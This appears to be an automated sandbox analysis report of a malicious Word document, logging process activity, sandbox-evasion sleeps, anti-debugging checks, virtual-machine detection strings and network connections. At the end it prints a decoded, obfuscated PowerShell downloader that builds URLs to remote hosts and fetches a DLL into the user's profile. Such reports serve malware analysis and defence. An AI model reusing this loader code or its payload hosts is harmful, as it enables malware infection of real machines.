Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Xqby\jcrucsb.dql:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Etxd\pkvco.wzp:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Eiig\mmslr.ajj:Zone.Identifier read attributes \| delete

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000BA3C

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_002075F0 FindFirstFileW,

20_2_002075F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000008.00000002.2142890318.000000000086D000.00000004.00000020.sdmp	Binary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\SysWOW64\rundll32.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_100031D0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_10015D3F

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_10015D3F

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B6AB2 mov eax, dword ptr fs:[00000030h]	7_2_001B6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D76B2 mov eax, dword ptr fs:[00000030h]	9_2_001D76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F6AB2 mov eax, dword ptr fs:[00000030h]	10_2_001F6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00306AB2 mov eax, dword ptr fs:[00000030h]	11_2_00306AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B76B2 mov eax, dword ptr fs:[00000030h]	12_2_004B76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C6AB2 mov eax, dword ptr fs:[00000030h]	13_2_001C6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D76B2 mov eax, dword ptr fs:[00000030h]	14_2_001D76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_001A6AB2 mov eax, dword ptr fs:[00000030h]	15_2_001A6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_001E76B2 mov eax, dword ptr fs:[00000030h]	17_2_001E76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_00206AB2 mov eax, dword ptr fs:[00000030h]	18_2_00206AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_002076B2 mov eax, dword ptr fs:[00000030h]	20_2_002076B2

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10005930 SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

7_2_10005930

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000BCEA SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_1000BCEA

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 202.187.222.40 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 184.66.18.83 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 167.71.148.58 187

Encrypted powershell cmdline option found

Source: unknown	Process created: Base64 decoded $ioxKy2 = [tYPE]("{2}{0}{3}{1}"-f'sTEm.iO.diRecT','y','Sy','Or') ; sEt-IteM vaRiabLe:16VJ ([tYPe]("{6}{7}{3}{5}{0}{2}{4}{1}" -F'V','r','IcEPoiN','NeT.S','TmaNaGE','eR','sYS','tem.') );$Kt3sbog=('B'+('m'+'v'+'kk9r'));$Mj5npw_=$Z9ls4z6 + [char](64) + $G35w524;$Yd085rx=('Ux'+('ee'+'_')+'wl'); ( gEt-itEM ('vaRI'+'AblE'+':'+'IoXKY2') ).VAlue::"C`RE`AT`e`dIREctOrY"($HOME + ((('IE'+'c')+'O'+('_'+'wgq')+'v'+('7'+'IEcC031')+('6emIE'+'c')) -crEplAcE ('IE'+'c'),[cHAR]92));$Ml29469=('R'+('6j'+'kuve')); ( VARiAbLe 16vj -vALUEon )::"sEC`Urityp`RoTo`coL" = ('Tl'+('s1'+'2'));$Nimh_ux=('He'+'z'+('fu'+'29'));$Mem0uwr = ('Ly'+('et'+'a6')+'ud');$Fj_inxi=(('Vv'+'3')+('jeg'+'8'));$Gyzf4g8=(('Q5'+'7qw')+'k'+'z');$C0w7ro6=$HOME+(('{0}O_wgqv'+'7'+'{0'+'}'+'C'+'0316em{0}') -f [ChAr]92)+$Mem0uwr+(('.d'+'l')+'l');$Gb3lyk8=(('Mx'+'1g')+('g'+'om'));$Rp56zra=NEW`-Ob`JeCt NeT.WEbCLiEnt;$Cj5kwnm=(((('http:qq)'+'(s2'+')(qq'+')'))+'('+(('s2'+')(zen'+'i'))+('thc'+'ampu'+'s.c')+(('o'+'mqq)(s2'+')'+'(lq'+'q)'))+(('(s'))+'2'+((')'+'(yQ'+'qq)('))+(('s'+'2)'))+('(@htt'+'p'+':q'+'q'+')(s2)')+(('(q'))+(('q'+')(s2)'))+(('(h'+'b'))+('privile'+'g')+('e'+'d.')+(('co'+'mqq)(s2)'+'(cg'+'i-bin'+'q'))+(('q)('+'s2)'))+(('(kcg'+'gFqq'))+((')'+'(s2)'))+('(@htt'+'p'+':'+'qq)')+'('+(('s2)('+'q'))+(('q)('+'s2)('+'l'+'oc'))+'al'+'af'+('fo'+'rdab'+'l'+'er')+('oof'+'e')+'r.'+'co'+(('mq'+'q)(s2'+')'))+'('+('r'+'al')+'ph'+'s-'+'r'+('e'+'ce')+(('ipt-f2uh'+'fqq'+')('))+'s2'+((')'+'(q'))+'T'+('T'+'5DC')+'qq'+')'+(('(s'+'2'
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $ioxKy2 = [tYPE]("{2}{0}{3}{1}"-f'sTEm.iO.diRecT','y','Sy','Or') ; sEt-IteM vaRiabLe:16VJ ([tYPe]("{6}{7}{3}{5}{0}{2}{4}{1}" -F'V','r','IcEPoiN','NeT.S','TmaNaGE','eR','sYS','tem.') );$Kt3sbog=('B'+('m'+'v'+'kk9r'));$Mj5npw_=$Z9ls4z6 + [char](64) + $G35w524;$Yd085rx=('Ux'+('ee'+'_')+'wl'); ( gEt-itEM ('vaRI'+'AblE'+':'+'IoXKY2') ).VAlue::"C`RE`AT`e`dIREctOrY"($HOME + ((('IE'+'c')+'O'+('_'+'wgq')+'v'+('7'+'IEcC031')+('6emIE'+'c')) -crEplAcE ('IE'+'c'),[cHAR]92));$Ml29469=('R'+('6j'+'kuve')); ( VARiAbLe 16vj -vALUEon )::"sEC`Urityp`RoTo`coL" = ('Tl'+('s1'+'2'));$Nimh_ux=('He'+'z'+('fu'+'29'));$Mem0uwr = ('Ly'+('et'+'a6')+'ud');$Fj_inxi=(('Vv'+'3')+('jeg'+'8'));$Gyzf4g8=(('Q5'+'7qw')+'k'+'z');$C0w7ro6=$HOME+(('{0}O_wgqv'+'7'+'{0'+'}'+'C'+'0316em{0}') -f 